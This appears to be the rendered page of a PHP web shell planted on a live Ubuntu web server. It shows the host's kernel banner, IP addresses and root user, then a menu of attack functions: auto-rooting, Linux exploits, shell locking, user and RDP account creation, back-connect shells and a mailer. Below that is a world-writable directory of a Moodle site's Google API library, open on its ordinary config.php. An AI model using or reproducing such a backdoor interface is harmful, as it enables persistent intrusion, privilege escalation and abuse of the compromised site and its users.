Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
google /
[ HOME SHELL ]
Name
Size
Permission
Action
auth
[ DIR ]
drwxrwxrwx
cache
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
external
[ DIR ]
drwxrwxrwx
io
[ DIR ]
drwxrwxrwx
service
[ DIR ]
drwxrwxrwx
Google_Client.php
13.17
KB
-rwxrwxrwx
LICENSE
10.02
KB
-rwxrwxrwx
NOTICE
123
B
-rwxrwxrwx
README
1.28
KB
-rwxrwxrwx
config.php
3.2
KB
-rwxrwxrwx
curlio.php
7.06
KB
-rwxrwxrwx
local_config.php
1.7
KB
-rwxrwxrwx
readme_moodle.txt
904
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ global $apiConfig; $apiConfig = array( // True if objects should be returned by the service classes. // False if associative arrays should be returned (default behavior). 'use_objects' => false, // The application_name is included in the User-Agent HTTP header. 'application_name' => '', // OAuth2 Settings, you can get these keys at https://code.google.com/apis/console 'oauth2_client_id' => '', 'oauth2_client_secret' => '', 'oauth2_redirect_uri' => '', // The developer key, you get this at https://code.google.com/apis/console 'developer_key' => '', // Site name to show in the Google's OAuth 1 authentication screen. 'site_name' => 'www.example.org', // Which Authentication, Storage and HTTP IO classes to use. 'authClass' => 'Google_OAuth2', 'ioClass' => 'Google_CurlIO', 'cacheClass' => 'Google_FileCache', // Don't change these unless you're working against a special development or testing environment. 'basePath' => 'https://www.googleapis.com', // IO Class dependent configuration, you only have to configure the values // for the class that was configured as the ioClass above 'ioFileCache_directory' => (function_exists('sys_get_temp_dir') ? sys_get_temp_dir() . '/Google_Client' : '/tmp/Google_Client'), // Definition of service specific values like scopes, oauth token URLs, etc 'services' => array( 'analytics' => array('scope' => 'https://www.googleapis.com/auth/analytics.readonly'), 'calendar' => array( 'scope' => array( "https://www.googleapis.com/auth/calendar", "https://www.googleapis.com/auth/calendar.readonly", ) ), 'books' => array('scope' => 'https://www.googleapis.com/auth/books'), 'latitude' => array( 'scope' => array( 'https://www.googleapis.com/auth/latitude.all.best', 'https://www.googleapis.com/auth/latitude.all.city', ) ), 'moderator' => array('scope' => 'https://www.googleapis.com/auth/moderator'), 'oauth2' => array( 'scope' => array( 'https://www.googleapis.com/auth/userinfo.profile', 'https://www.googleapis.com/auth/userinfo.email', ) ), 'plus' => array('scope' => 'https://www.googleapis.com/auth/plus.me'), 'siteVerification' => array('scope' => 'https://www.googleapis.com/auth/siteverification'), 'tasks' => array('scope' => 'https://www.googleapis.com/auth/tasks'), 'urlshortener' => array('scope' => 'https://www.googleapis.com/auth/urlshortener') ) );
Close